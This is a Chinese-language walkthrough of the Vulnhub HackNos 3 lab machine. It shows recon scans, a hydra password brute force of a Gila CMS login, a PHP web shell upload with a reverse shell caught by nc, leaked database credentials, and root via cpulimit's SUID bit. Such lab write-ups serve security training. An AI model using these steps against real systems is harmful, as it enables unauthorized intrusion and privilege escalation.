Vulnhub之HackNos 3靶机详细测试过程

HackNos 3

作者: Jason Huawen

靶机信息

名称:hackNos: Os-hackNos-3

地址:

https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/HackNos3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:0e:88:2f      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.231  08:00:27:92:85:a4      1      60  PCS Systemtechnik GmbH      

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.231

NMAP扫描

──(kali㉿kali)-[~/Desktop/HackNos3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.231 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-24 00:00 EDT
Nmap scan report for bogon (192.168.56.231)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ce:16:a0:18:3f:74:e9:ad:cb:a9:39:90:11:b8:8a:2e (RSA)
|   256 9d:0e:a1:a3:1e:2c:4d:00:e8:87:d2:76:8c:be:71:9a (ECDSA)
|_  256 63:b3:75:98:de:c1:89:d9:92:4e:49:31:29:4b:c0:ad (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: WebSec
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:92:85:A4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.21 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)

获得Shell

──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ nikto -h http://192.168.56.231
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.231
+ Target Hostname:    192.168.56.231
+ Target Port:        80
+ Start Time:         2023-03-24 00:23:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /, inode: c3, size: 599925bee00f9, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ 8725 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-03-24 00:24:40 (GMT-4) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 


──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ gobuster dir -u http://192.168.56.231 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.231
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,txt,js,sh
[+] Timeout:                 10s
===============================================================
2023/03/24 00:29:36 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 195]
/scripts              (Status: 301) [Size: 318] [--> http://192.168.56.231/scripts/]
/upload.php           (Status: 200) [Size: 0]
/devil                (Status: 301) [Size: 316] [--> http://192.168.56.231/devil/]
/websec               (Status: 301) [Size: 317] [--> http://192.168.56.231/websec/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1321485 / 1323366 (99.86%)
===============================================================
2023/03/24 00:34:38 Finished
==============================================================

Gobuster工具扫描出目录:/websec, 访问该目录,网页中有电子邮件,而且从页面内容来看,为CMS,因此度websec进一步扫描:

                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ gobuster dir -u http://192.168.56.231/websec -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.231/websec
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,js,sh,php,html
[+] Timeout:                 10s
===============================================================
2023/03/24 02:54:11 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index                (Status: 200) [Size: 4348]
/search               (Status: 200) [Size: 4348]
/about                (Status: 200) [Size: 3756]
/blog                 (Status: 200) [Size: 4348]
/1.sh                 (Status: 200) [Size: 4647]
/1.txt                (Status: 200) [Size: 4647]
/1                    (Status: 200) [Size: 4647]
/1.html               (Status: 200) [Size: 4647]
/01.php               (Status: 200) [Size: 4647]
/01.txt               (Status: 200) [Size: 4647]
/1.php                (Status: 200) [Size: 4647]
/1.js                 (Status: 200) [Size: 4647]
/01                   (Status: 200) [Size: 4647]
/01.html              (Status: 200) [Size: 4647]
/01.sh                (Status: 200) [Size: 4647]
/01.js                (Status: 200) [Size: 4647]
/login                (Status: 200) [Size: 1592]

从/websec的扫描中可以看到有登录入口/login以及管理员目录/admin,并且websec首页中的邮箱为管理员邮箱,即猜测[[email protected]]为管理员账号,但是接下来需要爆破密码

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ hydra -l [email protected] -P dict 192.168.56.231 http-post-form '/websec/login:username=^USER^&password=^PASS^:F=Wrong'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-24 03:06:59
[DATA] max 16 tasks per 1 server, overall 16 tasks, 54 login tries (l:1/p:54), ~4 tries per task
[DATA] attacking http-post-form://192.168.56.231:80/websec/login:username=^USER^&password=^PASS^:F=Wrong
[80][http-post-form] host: 192.168.56.231   login: [email protected]   password: Securityx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-24 03:07:02

利用hydra工具成功破解出了密码

登录成功后,访问其/admin目录

http://192.168.56.231/websec/admin

通过file manager功能上传shell.php,没有任何过滤,发现文件被放在了/assets目录,但是访问该目录返回错误

在该目录中发现了.htaccess文件禁止访问php文件,那么将deny from all删除后保存。

http://192.168.56.231/websec/assets/shell.php

可以成功得到shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ sudo nc -nlvp 5555        
listening on [any] 5555 ...
 connect to [192.168.56.230] from (UNKNOWN) [192.168.56.231] 33922
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 05:07:33 up  1:16,  0 users,  load average: 0.00, 0.21, 1.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/$ ls
ls
bin    etc             lib     lost+found  proc  snap      tmp      vmlinuz.old
boot   home            lib32   media       root  srv       usr
cdrom  initrd.img      lib64   mnt         run   swap.img  var
dev    initrd.img.old  libx32  opt         sbin  sys       vmlinuz
www-data@hacknos:/$ cd /home
cd /home
www-data@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root       root   4.0K Dec 10  2019 .
drwxr-xr-x 20 root       root   4.0K Dec 10  2019 ..
drwxr-xr-x  6 blackdevil docker 4.0K Dec 13  2019 blackdevil
www-data@hacknos:/home$ cd blackdevil
cd blackdevil
www-data@hacknos:/home/blackdevil$ ls -alh
ls -alh
total 40K
drwxr-xr-x 6 blackdevil docker 4.0K Dec 13  2019 .
drwxr-xr-x 3 root       root   4.0K Dec 10  2019 ..
-rw-r--r-- 1 blackdevil docker  220 May  5  2019 .bash_logout
-rw-r--r-- 1 blackdevil docker 3.7K May  5  2019 .bashrc
drwx------ 3 blackdevil docker 4.0K Dec 13  2019 .cache
drwxr-xr-x 3 blackdevil docker 4.0K Dec 13  2019 .config
drwx------ 3 blackdevil docker 4.0K Dec 10  2019 .gnupg
drwxr-xr-x 3 blackdevil docker 4.0K Dec 13  2019 .local
-rw-r--r-- 1 blackdevil docker  807 May  5  2019 .profile
-rw-r--r-- 1 root       root     33 Dec 13  2019 user.txt
www-data@hacknos:/home/blackdevil$ cat user.txt
cat user.txt
bae11ce4f67af91fa58576c1da2aad4b
www-data@hacknos:/home/blackdevil$ 

成功拿到了目标主机反弹回来的Shell,以及User Flag.接下来需要进行提权:

www-data@hacknos:/var/www/html/websec$ cat config.php
cat config.php
<?php

$GLOBALS['config'] = array (
  'db' => 
  array (
    'host' => 'localhost',
    'user' => 'cmsu',
    'pass' => 'securityx',
    'name' => 'cms',
  ),
  'permissions' => 
  array (
    1 => 
    array (
      0 => 'admin',
      1 => 'admin_user',
      2 => 'admin_userrole',
    ),
  ),
  'packages' => 
  array (
    0 => 'blog',
  ),
  'base' => 'http://192.168.1.20/websec/',
  'theme' => 'startbootstrap-creative',
  'title' => 'Gila CMS',
  'slogan' => 'An awesome website!',
  'default-controller' => 'blog',
  'timezone' => 'America/Mexico_City',
  'ssl' => '',
  'env' => 'pro',
  'check4updates' => 1,
  'language' => 'en',
  'admin_email' => '[email protected]',
  'rewrite' => true,
);www-data@hacknos:/var/www/html/websec$ 

虽然拿到了数据库连接的用户名和密码,但是登入数据库没有什么有价值的信息

提权

将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行该脚本:

-rwsr-xr-x 1 root root 31K Jul  6  2019 /usr/bin/cpulimit

可利用cpulimit的SUID位进行提权

www-data@hacknos:/tmp$ /usr/bin/cpulimit -l 100 -f -- /bin/sh -p
/usr/bin/cpulimit -l 100 -f -- /bin/sh -p
Process 2225 detected
# cd /root
cd /root
# ls -alh
ls -alh
total 56K
drwx------  8 root root 4.0K Dec 14  2019 .
drwxr-xr-x 20 root root 4.0K Dec 10  2019 ..
-rw-------  1 root root  162 Dec 14  2019 .bash_history
-rw-r--r--  1 root root 3.1K Aug 27  2019 .bashrc
drwx------  2 root root 4.0K Dec 13  2019 .cache
drwxr-xr-x  3 root root 4.0K Dec 13  2019 .composer
drwx------  3 root root 4.0K Dec 13  2019 .gnupg
drwxr-xr-x  3 root root 4.0K Dec 13  2019 .local
-rw-r--r--  1 root root  148 Aug 27  2019 .profile
drwx------  2 root root 4.0K Dec 10  2019 .ssh
-rw-------  1 root root 6.5K Dec 13  2019 .viminfo
-rw-r--r--  1 root root  547 Dec 13  2019 root.txt
drwxr-xr-x  3 root root 4.0K Dec 10  2019 snap
# cat root.txt
cat root.txt
########    #####     #####   ########         ########  
##     ##  ##   ##   ##   ##     ##            ##     ## 
##     ## ##     ## ##     ##    ##            ##     ## 
########  ##     ## ##     ##    ##            ########  
##   ##   ##     ## ##     ##    ##            ##   ##   
##    ##   ##   ##   ##   ##     ##            ##    ##  
##     ##   #####     #####      ##    ####### ##     ##


MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

Blog: www.hackNos.com

Linkedin: https://in.linkedin.com/in/rahulgehlaut
# 

成功拿到root shell以及root flag

热门相关:地球第一剑   刺客之王   仗剑高歌   第一神算:纨绔大小姐   网游之逆天飞扬